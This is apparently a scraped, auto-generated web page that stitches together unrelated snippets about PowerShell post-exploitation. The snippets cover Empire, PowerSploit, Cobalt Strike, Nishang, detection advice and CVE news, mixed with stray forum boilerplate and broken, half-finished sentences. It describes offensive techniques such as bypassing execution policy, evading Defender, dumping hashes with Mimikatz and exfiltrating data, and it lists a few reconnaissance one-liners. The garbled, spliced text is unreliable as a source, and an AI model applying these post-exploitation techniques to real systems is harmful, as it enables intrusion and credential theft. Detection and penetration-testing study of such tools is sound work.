Home

PowerShell exploitation

detecting PowerShell for exploitation. To be able to detect the most powershell commands and actions, you need to have some logging enabled first. Use either sysmon and/or enable the powershell logging at: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\ Windows\PowerShell\. Powershell logging at the group policy This is our second post in the article series 'PowerShell Empire'. In this article, we will cover all the exploits that lead to windows exploitation with the empire. To read our first post on empire series, which gives a basic guide to navigate your way through empire, click here. Table of Content: Exploiting through HT Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture The use of PowerShell by an attacker is as a post-exploitation tool; the malicious PowerShell code is being run since the attacker has access to run code on a system already. In some attacks a user was tricked into opening/executing a file or through exploiting vulnerability The constraints posed by CLM will block many of your exploitations attempts as key functionality in PowerShell is blocked. Bypassing CLM is largely the same as bypassing AppLocker as discussed above

The top category of threats detected across endpoints by Cisco Secure Endpoint was dual-use tools leveraged for exploitation and post-exploitation tasks. PowerShell Empire, Cobalt Strike,.. The company says no mitigation measures are available to block exploitation of the security flaw tracked as CVE-2021-26701. Customers are urged to install the updated PowerShell 7.0.6 and 7.1.3. PowerShellGet is a PowerShell module that contains commands for discovering, installing, publishing, and updating PowerShell modules (and other artifacts) to or from a NuGet repository. PowerShellGet ships with PowerShell version 5.0 and higher. It is available as a separate download for PowerShell version 3.0 and higher After that, it can do post-exploitation activities like taking screenshots, port scanning and browser pivoting, etc. Additionally, the Cobalt strike provides lateral movement using SMB and TCP beacons once the attacker gets initial access. Conclusion: This is an overview of the Cobalt Strike's scripted web delivery PowerShell attack framework

PowerShell offers a fileless attack process. You don't need to drop malware to run the attack on the target's machine. Attackers just need access to the box and can spin up PowerShell to call a remote file which would use malware/commands to perform actions on the target's machine PowerSploit: PowerShell Post-Exploitation Framework These modules allow you to run scripts on the target machine, prepare scripts for execution on a target machine, add persistence capabilities to a PowerShell script, extract data from the target machine and aid the user in performing reconnaissance during the penetration test The list includes various post-exploitation one-liners in pure PowerShell without requiring any offensive (= potentially flagged as malicious) 3rd party modules, but also a bunch of handy administrative commands. Let's get to it Empire is a post-exploitation framework. It's a pure PowerShell agent, focused solely on python with cryptographically-secure communications with the add-on of a flexible architecture. Empire has the means to execute PowerShell agents without the requirement of PowerShell.exe

One detection opportunity is to alert on a process that appears to be schtask.exe executing with a corresponding command line that includes create and powershell. The following image shows Sapphire Pigeon activity, but this analytic is useful beyond detecting just that cluster: Additional post-exploitation detection opportunitie PowerShell. Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. [1] Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code Powersploit modules: PowerUP PowerUp is a PowerShell tool to assist with local privilege escalation on Windows systems. It contains several methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings, and escalation opportunities PowerShell is a full Windows administration framework, and it's built into the OS. It can't be completely blocked. When we talk about post-exploitation in Windows environments, consideration of PowerShell is not a nice-to-have; it's a necessity

Detecting PowerShell for exploitation - mpauli

extremely basic usage of PowerShell - such as simply replacing the use of remote command execution tools such as PsExec with PowerShell's Invoke-Command or Enter-PSSession - to achieve their objectives and evade detection These post-exploitation activities largely rely on scripting engines like PowerShell and WMI because scripts provide attackers flexibility and enable them to blend into the normal hum of enterprise endpoint activity PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. Basically, it is a PowerShell Post-Exploitation Framework that helps you with various tasks like DLL injection, invoking shellcode and setting up script persistence. It also includes reflective PE injection and can reflectively load Mimikatz into memory. PowerShell has become a handy language to use for pentesting. These are only a few examples of how PowerShell can be leveraged on Kali Linux. However, there are many more ways that you can use PowerShell on Kali Linux. From a pentester standpoint, we have used PowerShell to expand our post-exploitation tactics Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework

Multiple Ways to Exploiting Windows PC using PowerShell Empir

  1. Welcome back my fellow hackers! Today we're going to be beginning to cover a post-exploitation framework named Empire.Empire implements Windows PowerShell in order to manipulate the infected host. Empire also encrypts the traffic between the C&C server and the host, providing secure C2 communications
  2. Empire is a post-exploitation framework, which its agents supporting various different Operating Systems (OS). Windows is purely implemented in PowerShell (without powershell.exe!), and Linux/macOS is done in Python 3. Feature rich with various options to bypass various protections (and allows for easy modification for custom evasion), Empire.
  3. Empire is a post-exploitation framework that includes a pure-PowerShell2. Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side, Empire implements the.
  4. istrator [Or replace to run any other command
  5. PowerShell reference. You can use the Windows Security app to configure Exploit protection, or you can use PowerShell cmdlets. The configuration settings that were most recently modified will always be applied - regardless of whether you use PowerShell or Windows Security
  6. Empire is a post-exploitation framework that includes a pure-PowerShell2. Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key.
  7. PowerShell Runspace Post Exploitation Toolkit. PSRecon. PSRecon gathers data from a remote Windows host using PowerShell (v2 or later), organizes the data into folders, hashes all extracted data, hashes PowerShell and various system properties, and sends the data off to the security team

According to the firm, there are no mitigation steps available to prevent the exploitation of the security issue identified as CVE-2021-26701. Customers are encouraged to update to PowerShell 7.0.6 and 7.1.3 as soon as possible in order to safeguard their systems from potential threats Post exploitation techniques for file transfers on Windows operating systems without the use of Metasploit or other advanced tools. PowerShell, installed by default on most modern versions of Windows can be leveraged to download files over HTTP in several ways By default PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems. This can be a hurdle for penetration testers, sysadmins, and developers, but it doesn't have to be. In this blog I'll cover 15 ways to bypass the PowerShell execution policy without having local administrator rights on the system. I'm sure there are man For those that do not know, PowerShell EMPIRE is a post exploitation framework written in PowerShell. This project has recently retired due to the heighten uptake in PowerShell visibility over the last few years, the project has stated it has reached its goal and has ended support

PowerShell Empire Building an Empire with PowerShel

When it comes to exploitation, arbitrary file creation is a vital functionality for an attacker to take it to the next stage. By planting a webshell on the remote file system, the attacker can achieve RCE on the target system. This is of course assuming that there is a web server running on the target system Triaging PowerShell Exploitation with Rekall David recently published his article Spotting the Adversary so I figured I'd continue the trend and focus on Blue Team tactics in this post. I've spent a fair bit of time in EnCase. They have a great product and a number of solutions to fit most of your needs, but at times it can feel bulky and a.

How to hack with Powershell is a common question. PowerShell is powerful and therefore dangerous in the world of security. On top of that it's everywhere, meaning it's already installed on Windows machines by default. Imagine now tools that allow the ethical hacker to run PowerShell without being detected, in memory PowerShell attacks CAN be detected, and everyone should be moving to configure their systems to record what is needed to capture PowerShell attacks and all the Fu that goes along with it. Because by default, Windows does NOT enable what you will need to detect PowerShell exploitation Post Exploitation with Empire 2.3.0 -. Empire is a post-exploitation framework that includes a pure-PowerShell2. Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture This blog will demonstrate how to download Empire, a PowerShell post-exploitation tool, in Kali Linux, create a script, make a connection back to your machine from the victim machine without Windows Defender blocking it, elevate privileges, and extract password hashes using Mimikatz

Detecting Offensive PowerShell Attack Tools - Active

PowerShell Empire has two modules which can retrieve domain hashes via the DCSync attack. Both modules needs to be executed from the perspective of domain administrator and they are using Microsoft replication services. There is also a post exploitation module which can be linked into an existing Meterpreter session in order to retrieve. Per Microsoft's blog, they have identified additional post-exploitation activities, including: Credential theft via dumping of LSASS process memory. Compression of data for exfiltration via 7-Zip. Use of Exchange PowerShell Snap-ins to export mailbox data. Use of additional offensive security tools Covenant, Nishang, and PowerCat for remote. The increased use of PowerShell exploitation supports a growing industry trend of malware authors experimenting with ways of evading detection by exploiting operating system (OS) tools, the report. Post Exploitation with Empire 2.3.0 Empire is a post-exploitation framework that includes a pure-PowerShell2. Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture PowerSploit - A PowerShell Post-Exploitation Framework. PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts: Execute code on a target machine

Windows & Active Directory Exploitation Cheat Sheet and

Origins. Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability. Combined with the extensive functionality PowerShell provides, it is clear PowerShell is an extremely powerful post-exploitation tool. Using PowerShell to administer your environment An assessment of the security implications of allowing PowerShell in an organisation may lead to the immediate desire to block access to PowerShell If you have the value of __VIEWSTATEGENERATOR you can try to use the --generator parameter with that value and omit the parameters --path and --apppath. If the ViewState deserialization vulnerability is successfully exploited, an attacker-controlled server will receive an out of band request containing the username. PoC of Successful Exploitation Any image, link, or discussion related to child pornography, child nudity, or other child abuse or exploitation. Details (required): 250 characters remaining Cancel Submit The powershell option is not working for me at all. Reply Report abus

PowerShell Is Source of Over 1/3 of Critical Security Threat

  1. Empire is a post-exploitation framework that combines the power of Powershell and Python to create a framework which can be used to deploy post-exploitation modules such as keyloggers or Mimikatz on the target systems. This Framework uses the power of cryptography to secure communications while also offering a flexible architecture
  2. The Windows PowerShell team almost cut this feature because it turns out to be quite hard to do in a sensible way. Here is the syntax for Remove-Module: When a module is removed, all the modules it loaded as nested modules are also removed from the global module table. This happens even if the module was explicitly loaded at the global level
  3. The Microsoft team released some PowerShell scripts to help you search for exploitation artifacts such as manually created .aspx files. Researcher Kevin Beaumont also released a quick-and-dirty nmap script to find potentially vulnerable servers in your environment
  4. Nishang is an open source framework with a several powerful PowerShell scripts that you can use during the post exploitation phase of your penetration test. It has many scripts categorized into various categories such as information gathering, scanning, privilege elevation etc
  5. Powershell can be found by right clicking on the start button & it should show it the list, from there you can right click on it & choose properties to find where it is stored on your system. Or click on the search icon in the taskbar & enter powershell which will also find the program. Virginia - Time Lady. Report abuse

Microsoft warns of critical PowerShell 7 code execution

Empire is a post-exploitation framework that includes a pure-PowerShell2. Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture PoshC2: PoshC2 is a proxy aware C2 framework that utilizes Powershell and/or equivalent (System.Management.Automation.dll) to aid penetration testers with red teaming, post-exploitation and lateral movement. Powershell was chosen as the base implant language as it provides all of the functionality and rich features without needing to introduce. In this video, I talked about how to create an executable HTML page that runs remote code execution on the target.---Receive video documentation, QA and requ.. But, for us, as pentesters, PowerShell represent a powerful shell and scripting language which is present (in most cases from windows 7, it's integrated by default) on our pentest targets and provide to us specially a powerful post-exploitation tool/language that can give us so much power and a very big attack surface/possibility

Slashdot reader storagedude writes: That's right, Microsoft's CLI management tool was the source of more than a third of critical security threats detected by Cisco in the second half of 2020, according to eSecurity Planet. Dual-use tool exploitation was the top threat category noted by Cisco, followed by ransomware, fileless malware, and credential dumping, with PowerShell a primary vector in. Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused. WMI PWNAGE • WMI attacks often use PowerShell once on the system, but many Red Teamers avoid this since it is well known, but still commonly used - Good logging can/will catch Red Team PowerShell • DCOM and WinRM are also used a lot in these attacks LOG-MD.com. 19. DETECTING WMI EXPLOITATION LOG-MD.com. 20 The output of this PowerShell script will resemble the following. Enabled protections appear in the output as True.. PS C:\> Get-SpeculationControlSettings. Speculation control settings for CVE-2017-5715 [branch target injection] Hardware support for branch target injection mitigation is present: False PowerShell is a new generation command line application developed as an alternative to Windows command line cmd.exe and Windows Script Host. The target here will be to collect information over the target Active Directory structure via PowerShell. The purpose of this article is to gather information using Windows features without using tools

One-liners and the pipeline - PowerShell Microsoft Doc

As this is a post-exploitation data retrieval tool, operators of Exchange servers can prevent threat actors from engaging in this type of data exfiltration by diligently installing security patches and updates for their Windows servers, including updates to Exchange, as soon as they are made available PowerShellArmoury - A PowerShell Armoury For Security Guys And Girls | Professional Hackers India Provides single Platform for latest and trending IT Updates, Business Updates, Trending Lifestyle, Social Media Updates, Enterprise Trends, Entertainment, Hacking Updates, Core Hacking Techniques, And Other Free Stuff

Cobalt Strike 2021 - Analysis of Malicious PowerShell

  1. Powershell: Get-ChildItem C:\Users; Password Policy: net accounts; Get content of clipboard: powershell -command Get-Clipboard Running Processes. List processes running and services: tasklist /SVC; Filter system processes: tasklist /v /fi username eq syste
  2. Learn how to use the Homebrew package manager to install post-exploit security tools on macOS to further assess compromised system vulnerabilities found in your Apple equipment
  3. My Favorite PowerShell Post-Exploitation Tools. PowerShell became a key part of my red team toolkit in 2014. Cobalt Strike 2.1 added PowerShell support to the Beacon payload and this has made an amazing library of capability available to my users. In this post, I'd like to take you through a few of my favorite collections of PowerShell scripts
  4. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework. To install. run the ./setup/install.sh script

Detecting the Exploitation of Pentesting Tools: Gaining

  1. Additionally, malicious post-exploitation use of PowerShell on a server system is primarily associated with an active adversary, rather than the static approach used by commodity malware on client systems. Without Application Control (as described by point #4 above), active adversaries simply use other scripting languages or custom tooling
  2. Another PowerShell project that leverages unmanaged PowerShell is P0wnedShell a PowerShell Runspace Post Exploitation Toolkit. It runs PowerShell commands and functions within a powershell runspace environment (.NET) and includes many PowerShell attack tools, including those from PowerSploit, Nishang, PowerCat, Inveigh, etc all contained.
  3. istrator access. Need to know. Shells and Privilege Escalation. Once you have initial access on a machine, learn how to escalate your account privileges to root..
  4. In the context of exploitation, PowerShell obfuscation is heavily utilized in order to bypass and circumvent detection methods. It increases the difficulty for incident responders to quickly identify the purpose of the specific command. CertUtil is a Windows program used to download and update certificates 2. In the past, adversaries have.

Prevent exploitation using AppLocker and other Windows OS hardening techniques in a scalable way with PowerShell. Configure PowerShell remoting to use Just Enough Admin (JEA) policies to create a Windows version of Linux sudo and setuid root Else you can use the below PowerShell script to run commands as that user. Windows Kernel Exploitation. If the OS is updated regularly then these exploit will not be of much help. You can use Watson to check for vulnerabilities due to missing patches. Watson is already integrated with winPEAS

PowerShell Exploitation • Malware loves to use PowerShell to download and launch payloads - They try and hide it too • Red Teamers love PowerShell - They love to hide too - It is already built into the OS • But they DO make noise and CAN be detected - If you know how MalwareArchaeology.co In recent weeks, Microsoft has detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server in a ubiquitous global attack. ProxyLogon is the name given to CVE-2021-26855, a vulnerability on Microsoft Exchange Server that allows an attacker to bypass authentication and impersonate users PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts: Execute code on a target machine. Injects a Dll into the process ID of your choosing PowerSploit: A Post-Exploitation Framework in PowerShell! PowerSploit is an opensource, offensive Microsoft PowerShell toolkit that has been coded to help penetration testers in almost all phases of an assignment. It can help you perform reconnaissance and also help you to elevate your privileges and maintain access

Successful exploitation of the HiveNightmare flaw allows a local adversary to run arbitrary code with SYSTEM rights. As a result, the hacker can launch malicious software on the targeted instance, access and manipulate sensitive data, or even create new admin accounts. However, there is a limitation to leverage CVE-2021-36934 p0wnedShell is an offensive PowerShell Runspace Post Exploitation host application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a PowerShell run space environment (.NET). It has a lot of offensive PowerShell modules and binaries included making the process of Post Exploitation easier. What the author tried was to build an all in one.

The exploit we will see today is a POST exploitation Metasploit exploit that performs Powershell enumeration in Windows. Windows PowerShell is a task automation and configuration management framework designed by Microsoft which consists of a command line shell and associated scripting language built on the .NET Framework and .NET Core p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier Roman Guillermo Roman Guillermo. Recently, Microsoft issued the patch for CVE-2020-1472 a.k.a. Zerologon, a critical vulnerability that allows an attacker without credentials to elevate to the highest possible privileges in the domain. So, you have applied the patch * to all your systems, especially all your domain controllers (DC)

PowerSploit: PowerShell Post-Exploitation Framework

Cobalt Strike's Beacon now has the ability to work with PowerShell. Import a script into Beacon and invoke its cmdlets at will. This opens up a world of poss.. RomBuster. RomBuster is a router exploitation tool that allows to disclosure network router admin password. Features. Exploits vulnerabilities in most popular routers such as D-Link, Zyxel, TP-Link and Huawei.; Optimized to exploit multiple routers at one time from list PowerShellArmoury - A PowerShell Armoury For Security Guys And Girls. CSIRT-Collect - PowerShell Script To Collect Memory And (Triage) Disk Forensics. Ruse - Mobile Camera-Based Application That Attempts To Alter Photos To Preserve Their Utility To Humans While Making Them Unusable For Facial Recognition Systems A recent proof of concept exploit was published (and quickly deleted) containing an unpatched 0-day in all supported Windows Operating Systems. Unfortunately, by the time the exploit was deleted, the Proof of Concept was already forked and is now used by adversaries in the wild with a heavy focus on exploiting Domain Controllers to gain full domain compromise The mass exploitation of Exchange Servers has been a wake-up call, and it will take all parties playing in concert for the industry to react, respond, and recover. a PowerShell alias for.

PowerShell Commands for Pentesters - InfosecMatte

  1. PowerZure is a framework designed to perform reconnaissance and exploitation of the Azure cloud platform, Azure Active Directory, and associated resources. The project [1] is maintained by Ryan Hausknecht, who recently released a new version (2.0) of the framework. The tool is now equipped with the following attack components and its functions: Operational functions with backdoor/payload.
  2. Recently, PowerShell is often used in the post-exploitation . PowerShell Empire (Powershell empire) is a well-known tool implemented as the post-exploitation framework using PowerShell. For this reason, we set the PowerShell Empire modules (204 modules) as the agent action list A. A is classified into 12 groups by the characteristics
  3. Cobalt Strike (CS) is a paid penetration testing toolkit that allows an attacker to deploy a component named Beacon on a victim's machine. The simplicity, reliability, and versatility of CS make it very popular among threat actors—and there are plenty of cracked versions of CS available on the dark web [1]. Given this reality, it's been.
  4. In recent weeks, there has been quite a lot of reporting on the exploitation of the latest disclosed vulnerabilities in Microsoft's Exchange Server by an attacker referred to as HAFNIUM. One of the major reasons these latest vulnerabilities are so dangerous and appealing to attackers is that they allow them to go directly from the public internet to executing processes as SYSTEM, the most.
  5. dset.

Mass exploitation of on-prem Exchange servers : (. On the afternoon of March 1st, an MSP partner reached out and warned our team about possible undisclosed Exchange vulnerabilities successfully exploiting on-prem servers. We confirmed the activity and Microsoft has since released an initial blog and emergency patches for the vulnerabilities WMImplant - A WMI Based Agentless Post-Exploitation RAT Developed in PowerShell. March 23, 2017 | by Christopher Truncer. Rat. Just over one year ago (November 2015), I released WMIOps, a PowerShell script that enables a user to carry out different actions via Windows Management Instrumentation (WMI) on the local machine or a remote machine. PowerShell Remoting is essentially a native Windows remote command execution feature that's build on top of the Windows Remote Management (WinRM) protocol. Based on my super Google results, WinRM is supported by Windows Vista with Service Pack 1 or later, Windows 7, Windows Server 2008, and Windows Server 2012

Hacking with Empire - PowerShell Post-Exploitation Agen

PowerSploit - A PowerShell Post-Exploitation Framewor

Microsoft Exchange exploitation: how to detect, mitigate

Trouble with HAFNIUM (CVE-2021-26855) indicator of exploitation powershell. by leedavila. on Mar 3, 2021 at 21:42 UTC. Solved Microsoft Exchange. 7. Next: Service transport exchange . CodeTwo. 1,268 Followers - Follow. 22 Mentions; 11 Products; Adam (CodeTwo) IT Animal. GROUP SPONSORED BY CODETWO. PowerShell, upgrade it, and start a PowerShell session using the ISE Discover PowerShell commands and cmdlets and understand PowerShell formatting Use the PowerShell help system to understand what particular cmdlets do Utilise the pipeline to perform typical data manipulation Package your code i

Hacking with Empire - PowerShell Post-Exploitation AgentComment obtenir le shell Bash Linux sous Windows 10Toolkits ofensivos en PowerShell

Video: Command and Scripting Interpreter: PowerShell, Sub

Koadic - COM Command & Control Framework (JScript RATRéparer un système Windows 10 corrompu avec leExtracting Password Hashes from the NtdsCVE-2020-2883: Oracle WebLogic DeserializationKoadic – Windows post Exploitation tools